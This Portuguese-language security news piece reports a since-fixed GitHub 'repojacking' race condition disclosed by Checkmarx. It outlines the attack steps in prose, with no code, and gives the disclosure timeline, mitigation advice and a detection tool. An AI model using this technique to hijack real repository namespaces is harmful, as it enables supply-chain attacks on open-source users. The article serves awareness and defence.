Recentemente, foi descoberta uma vulnerabilidade no GitHub que pode ter colocado milhares de repositórios em risco de ataques de “repojacking”. Essa técnica envolve um invasor assumindo o controle de um repositório na plataforma, GitHub neste caso, explorando uma falha lógica que o torna vulnerável a usuários renomeados. Uma vez estabelecido o controle, o invasor assume o controle de um namespace legítimo, que normalmente é popular. Um namespace é formado combinando o nome de usuário e o nome do repositório, como “exemplo de usuário/exemplo de repositório”.
A possibilidade de Repojacking torna-se uma preocupação quando um namespace se torna vulnerável devido à alteração do nome de usuário original através da funcionalidade “renomear usuário”. Este processo de alteração de nomes de usuário é simples e rápido. No entanto, é importante observar que uma mensagem de aviso irá alertá-lo sobre o redirecionamento de todo o tráfego da URL do repositório antigo para o novo.
A nova abordagem da Checkmarx capitaliza uma potencial condição de corrida que surge durante a criação de um repositório e a renomeação de um nome de usuário. Esta abordagem, conhecida como reprojacking, envolve a seguinte sequência de ações:
• A vítima possui o namespace “victim_user/repo”;
• A vítima renomeia “victim_user” para “renamed_user”;
• O repositório “victim_user/repo” agora está aposentado;
• O agente de ameaça com o nome de usuário “attacker_user” cria simultaneamente um repositório chamado “repo” e renomeia o nome de usuário “attacker_user” para “victim_user”;
• Para executar a etapa final, uma solicitação de API é empregada para criar o repositório seguida por uma interceptação de uma solicitação de renomeação para modificar o nome de usuário.
A falha pode ser usada por partes mal-intencionadas para aproveitar uma fraqueza nas operações do GitHub de renomear nomes de usuários e criar repositórios. A exploração desta falha teria um impacto significativo na comunidade de código aberto, pois permitiria o comando de mais de 4.000 pacotes de código em linguagens populares como PHP, Go e Swift, além de compartilhamentos do GitHub.
Em 1º de março de 2023, ocorreu a divulgação responsável de um problema na plataforma de hospedagem de código GitHub, de propriedade da Microsoft. O problema foi resolvido em 1º de setembro de 2023. Uma nova vulnerabilidade foi descoberta na criação e renomeação de repositórios em perfis de usuários no GitHub. Esta descoberta enfatiza os perigos contínuos associados ao mecanismo de retirada de namespace de repositório comumente usados.
Mitigação
Para reduzir o risco de RepoJacking, é aconselhável evitar namespaces desativados em seu código. Isso não apenas minimiza sua superfície de ataque, mas também garante que não haja dependências em seu código que possam levar a um repositório GitHub vulnerável.
Além disso, vale a pena considerar o uso do ChainJacking uma solução de código aberto desenvolvida pela Checkmarx. ChainJacking ajuda a identificar quaisquer dependências diretas de Go lang no GitHub que sejam vulneráveis ao ataque RepoJacking.
Link da ferramenta ChainJacking: https://github.com/Checkmarx/chainjacking
Para ver mais detalhes sobre como esta vulnerabilidade você pode acessar o endereço: https://checkmarx.com/blog/persistent-threat-new-exploit-puts-thousands-of-github-repositories-and-millions-of-users-at-risk/
Service IT Security
